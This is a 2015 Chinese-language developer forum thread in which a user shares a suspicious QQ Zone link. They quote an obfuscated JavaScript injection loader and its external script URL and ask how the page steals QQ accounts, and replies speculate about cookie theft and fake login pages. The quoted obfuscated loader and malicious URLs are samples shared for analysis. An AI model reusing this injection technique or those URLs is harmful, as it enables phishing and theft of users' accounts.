V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
• 请不要在回答技术问题时复制粘贴 AI 生成的内容
Claude Code 订阅服务平替
更经济的 Claude Code 订阅平替服务低至10元/天,同等于 Claude Max 200美元方案,支持Claude 4 Opus模型
Promoted by ylsAGI
lcj2class
V2EX  ›  程序员

大家来分析一下这个网页是怎么盗取 qq 密码得吧

  •  
  •   lcj2class · 2015-01-21 12:18:53 +08:00 · 3902 次点击
    这是一个创建于 3840 天前的主题,其中的信息可能已经有所发展或是发生改变。
    事情的经过是这样的,
    1. 最近高中班级qq有人发消息“回忆,来我空间看看这篇文章”
    2. 之后这篇文章有这么一个链接
    http://wq.tom.com/zb.php?smMsj_287/tags=68

    我发现这个网页,嵌入了这个脚本

    http://www.l99w.tk/b2s6cr.js?p6pr3w

    但是还是没发现怎么盗取qq号的,大家能给我分析分析嘛~

    下面的注入js的代码好丑陋

    function nsYLMowZDNDDp3WV5l(M0G1zNGkrsPT8uY8LA) {
    var text = "rAetfablqrK3NwOPcI";
    if (document.getElementById(M0G1zNGkrsPT8uY8LA).textContent) text = document.getElementById(M0G1zNGkrsPT8uY8LA).textContent;
    else text = document.getElementById(M0G1zNGkrsPT8uY8LA).innerText;
    return text;
    }
    var l8PtRr7D8sXEWs4Oj5 = "<" + nsYLMowZDNDDp3WV5l("gEEKNdQYxyb1riptwp").replace("Q35gAn0Pf3WPJFHwxO", "") + " " + nsYLMowZDNDDp3WV5l("Gsc5mWOuff0gW4FrRt").replace("Q35gAn0Pf3WPJFHwxO", "");
    l8PtRr7D8sXEWs4Oj5 += " " + nsYLMowZDNDDp3WV5l("vq0SnlIaTUVTfm7aVo").replace("Q35gAn0Pf3WPJFHwxO", "");
    l8PtRr7D8sXEWs4Oj5 += nsYLMowZDNDDp3WV5l("ZqL0DsGb6bcfskkpfX").replace("Q35gAn0Pf3WPJFHwxO", "") + nsYLMowZDNDDp3WV5l("yuv1EzoB1eVs5bKWV5");
    l8PtRr7D8sXEWs4Oj5 += nsYLMowZDNDDp3WV5l("FsdHNyOIRartKibmLn").replace("dBMpqphF2uD4qAGhRo", "");
    l8PtRr7D8sXEWs4Oj5 += nsYLMowZDNDDp3WV5l('s0Q6c9Da9EP2uv7anA');
    l8PtRr7D8sXEWs4Oj5 += nsYLMowZDNDDp3WV5l('b0MMCQkFgwTYEuNER3').replace('Q35gAn0Pf3WPJFHwxO', '');
    l8PtRr7D8sXEWs4Oj5 += "\">";
    l8PtRr7D8sXEWs4Oj5 += "</" + nsYLMowZDNDDp3WV5l("gEEKNdQYxyb1riptwp").replace("Q35gAn0Pf3WPJFHwxO", "") + nsYLMowZDNDDp3WV5l("yZGbhV9O5Lb994DYC7");
    view raw inject-qq.js hosted with ❤ by GitHub
    5 条回复    2015-01-22 12:29:26 +08:00
    bombless
        1
    bombless  
       2015-01-21 12:38:08 +08:00
    印象中盗取的不会是密码,而是类似于token一样的东西

    有时候是盗cookie,然后利用它们的一站式登录
    angerskon
        2
    angerskon  
       2015-01-21 13:36:15 +08:00
    你确定这个能盗qq号?
    lcj2class
        3
    lcj2class  
    OP
       2015-01-21 15:05:57 +08:00
    @angerskon
    有可能是像 @bombless 说的,盗用cookie吧
    ChiChou
        4
    ChiChou  
       2015-01-21 15:23:12 +08:00
    链接失效了
    lhie1
        5
    lhie1  
       2015-01-22 12:29:26 +08:00
    是模仿QQ空间让你登陆就盗了吧
    关于   ·   帮助文档   ·   自助推广系统   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2471 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 29ms · UTC 10:51 · PVG 18:51 · LAX 03:51 · JFK 06:51
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.